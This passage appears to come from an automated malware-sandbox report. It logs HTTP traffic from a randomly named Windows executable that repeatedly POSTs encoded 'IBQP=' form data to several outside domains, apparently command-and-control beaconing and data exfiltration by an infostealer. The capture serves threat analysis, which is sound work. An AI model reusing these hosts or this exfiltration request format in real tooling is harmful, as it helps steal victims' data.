                                                                                                Host: www.7fh27o.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:37.974514961 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:01:37 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.11.20 | 49755 | 185.68.16.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:43.756465912 CET | 747 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnrOaJaw3Wk2FrBfiDwFpx2mo9gFKYkPNLipdBP66rLm8LnyMYgbBYQIpvQQgWcY4wvTzgb0bmYv6OASmQ8erZESjbB4HRFeGYzPiG2Hu3MgEZ41ltLZiCwU2b7Ql6drX11milUtSS5N7JmpZug7qHElN/5MKJfEhCVglQs32egeBGvZP0leBmCA==
                                                                                                Nov 11, 2024 17:01:44.004575968 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:43 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                10 | 192.168.11.20 | 49756 | 185.68.16.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:46.540749073 CET | 767 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk6dLiJNBdvOrMm8LvSMR9LBXQIlRQQsWcYswvSDgbjHlbf6MbCmehOrZESjbB4iKFeuYz/SG2muwCAEeyVltPZjqwU3M7SQfdvn11nylU5ONwN7P75YXjq3jIlNK5+ahFl9qU2oKxFC6jNd0rp2cncA9fLeFuBJwFHbn1mLfeKpSf8c=
                                                                                                Nov 11, 2024 17:01:46.788795948 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:46 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                11 | 192.168.11.20 | 49757 | 185.68.16.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:49.321801901 CET | 3867 | OUT | POST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:49.321827888 CET | 4049 | OUT |
                                                                                                Data Ascii: B7I316k+HgJ1QyTPS8YPa0JECzfzi6mcMxsrEYtWnKZsIEEsmBlQU5NJKSsP3Sxg1G5vb+XutbQNN/McHiEhr2S0JXwzCLLMo/Yki3cxUtLElI68uxl5xwRBNtO/+3wyeEXxqFLDjVz6ojMU/93DhiKc/MYFo+OJW+z7NxxUXLGqcNeyRQqYUutFRcmj035UpqDdSwpB0B9iZF2fW0nPRU8cZKKSX+Cy4ndnny+R5cp21QBvSeJ
                                                                                                Nov 11, 2024 17:01:49.570049047 CET | 735 | IN | HTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:49 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                12 | 192.168.11.20 | 49758 | 185.68.16.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:52.099905968 CET | 493 | OUT | GET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:52.348261118 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:52 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
                                                                                                Nov 11, 2024 17:01:52.348331928 CET | 1289 | IN |
                                                                                                Data Ascii: '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno doda
                                                                                                Nov 11, 2024 17:01:52.348392010 CET | 1289 | IN |
                                                                                                Data Ascii: edex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:01:52.348445892 CET | 1289 | IN |
                                                                                                Data Ascii: '.message1': ' <b>www.redex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:01:52.348490000 CET | 1122 | IN |
                                                                                                Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                13 | 192.168.11.20 | 49759 | 199.59.243.227 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:57.670465946 CET | 780 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFodUef21TGkRc7BrohMffbdWuNOZ0RHrBn4d/PgjjvN4M04xvU+L3EwujaA+Ri7tsCRdXHbTV626cqMRhJh4s83/nCLGEf+6ytcGQo3EZabDCFOLuSDGmsWrOHuBRiCwkbqwU3Ea/dOnTCTsS1FgdjCkWhTC9vSqb2BvY69uESqZbxnHIM3UMbw==
Nov 11, 2024 17:01:57.805486917 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:01:56 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 9cf3408c-f899-4562-9db9-4f51656571a2
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=9cf3408c-f899-4562-9db9-4f51656571a2; expires=Mon, 11 Nov 2024 16:16:57 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:01:57.805496931 CET | 550 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWNmMzQwOGMtZjg5OS00NTYyLTlkYjktNGY1MTY1NjU3MWEyIiwicGFnZV90aW1lIjoxNzMxMzQwOTE3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49760 | 199.59.243.227 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:02:00.314034939 CET | 800 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=zeF4BSP+n9dFq9keZUdTR0Qu1hrorsfTbdquNKArRVPBnYN/OibjsN4MsoxqaeLCEwzeaBCRi75sCTFXHKTW4m6esMRjGB4s83/nCLTZf6uyus2QqV8eS7DNTeLuYjGisWrsHvd7iA4kbo4U51a8KenVcjtZ438SnSEAkxrgrB2X63iCnPagR5Fp1X+gO1VXGzqUg6Wo+7GX+PBjlTxEZ0c=
Nov 11, 2024 17:02:00.449143887 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:00 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 7cd97e61-6963-4d28-a3f0-5f4033ab2e4f
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=7cd97e61-6963-4d28-a3f0-5f4033ab2e4f; expires=Mon, 11 Nov 2024 16:17:00 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:02:00.449215889 CET | 550 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2NkOTdlNjEtNjk2My00ZDI4LWEzZjAtNWY0MDMzYWIyZTRmIiwicGFnZV90aW1lIjoxNzMxMzQwOTIwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49761 | 199.59.243.227 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:02:02.982228994 CET | 2578 | OUT | POST /m462/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Origin: http://www.havan-oficial.online
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.havan-oficial.online/m462/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 7a 65 46 34 42 53 50 2b 6e 39 64 46 71 39 6b 65 5a 55 64 54 52 30 51 75 31 68 72 6f 72 73 66 54 62 64 71 75 4e 4b 41 72 52 56 48 42 6e 72 31 2f 4f 44 62 6a 74 4e 34 4d 67 49 78 72 61 65 4c 6c 45 77 37 53 61 42 4f 76 69 35 42 73 44 77 4e 58 51 49 37 57 78 6d 36 65 75 4d 52 6d 4a 68 34 39 38 33 76 6a 43 4c 44 5a 66 36 75 79 75 71 79 51 75 48 45 65 51 37 44 43 46 4f 4c 79 53 44 48 48 73 57 6a 57 48 76 5a 42 69 77 59 6b 56 6f 49 55 30 6d 79 38 56 75 6e 58 64 6a 73 5a 34 33 78 53 6e 53 59 6d 6b 79 32 31 72 43 57 58 35 68 36 63 69 73 66 34 41 34 77 6c 34 33 6a 65 59 58 4e 37 45 69 36 70 6a 59 65 49 79 2f 47 7a 30 64 4e 77 30 42 5a 37 48 42 45 63 73 32 6b 4a 6a 54 33 63 73 76 31 32 42 36 63 6c 56 75 79 46 64 4d 53 43 76 4f 42 36 75 5a 55 68 55 35 6f 67 46 57 75 4b 53 35 4e 57 37 46 54 75 56 2f 30 45 4d 47 68 57 31 45 78 33 52 71 7a 31 43 66 31 4a 4f 31 2b 6e 6e 53 58 63 38 35 4d 69 69 74 5a 76 39 6e 44 50 50 5a 2b 58 33 74 33 75 59 4f 45 32 57 72 4b 56 66 48 52 4f 70 5a 58 6a 47 54 32 77 65 [TRUNCATED]
Nov 11, 2024 17:02:02.982302904 CET | 5371 | OUT
                                                                                                Data Ascii: eI/GpDWCo0h0Ddx6M7WUQUaQH0kI3aWLZTmgUuApO2lSrGSdvFMl0/HeYAQZSda/2HKX5wXvZO20zfL4430ON5BUELlJKQFMkgzIMfzJaW+qMol71wr/mfBA96f0ucz1rwMGrPyrS0NeDitOTipC5yNK4qafxTIllUzK7Owp1Tbr/fOf9MhBZxFyWijOdr1YcMSmH9ZX9pZnwcaHN9DFG3E6mOW6t1Nb72tzGMdTsfkjeNPQoSW
Nov 11, 2024 17:02:03.117254019 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:02 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1150
                                                                                                x-request-id: 4ab9bd4c-feaf-4c50-9f73-fd00803b2f91
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==
                                                                                                set-cookie: parking_session=4ab9bd4c-feaf-4c50-9f73-fd00803b2f91; expires=Mon, 11 Nov 2024 16:17:03 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_t8BRFLPv3wV64jiIIxGWCVD8H+IpcLZUh04a4QJSNVS+nuKAnO/o3X7ZYz3k8y0T6P6ShcjgDnMZmcsbwgzNhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:02:03.117263079 CET | 550 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGFiOWJkNGMtZmVhZi00YzUwLTlmNzMtZmQwMDgwM2IyZjkxIiwicGFnZV90aW1lIjoxNzMxMzQwOTIzLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49762 | 199.59.243.227 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:02:05.638314009 CET | 504 | OUT | GET /m462/?Lr3=uHMLTHRPCpsdapr&IBQP=+ctYCmnSkPlep9Adc1BBeyk16jbVmqK7c+CyNKpVFEvGl71cISvbhoUUnqNAW+fldTGCXi6FrrY6EQlGHI7/1BufmIEFBScb4VziJby0bO6di8KjpFsVcvc= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.havan-oficial.online
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:02:05.773503065 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 11 Nov 2024 16:02:05 GMT
                                                                                                content-type: text/html; charset=utf-8
                                                                                                content-length: 1490
                                                                                                x-request-id: 8f8a61e4-51b2-4f70-8735-ddad8e718586
                                                                                                cache-control: no-store, max-age=0
                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==
                                                                                                set-cookie: parking_session=8f8a61e4-51b2-4f70-8735-ddad8e718586; expires=Mon, 11 Nov 2024 16:17:05 GMT; path=/
                                                                                                connection: close
                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FXHELMCSvHfvZQ3fdxfXMjkxnlVuXcTL5OPTt/qm0O8RYNA9u7PK9d0xDL6/WOOqcqXaX6SGwQ4cDMI0FbTepg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 11, 2024 17:02:05.773549080 CET | 890 | IN
                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY4YTYxZTQtNTFiMi00ZjcwLTg3MzUtZGRhZDhlNzE4NTg2IiwicGFnZV90aW1lIjoxNzMxMzQwOTI1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaGF2YW4tb2ZpY2lhbC5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49763 | 192.64.118.221 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:02:11.256803989 CET | 753 | OUT | POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
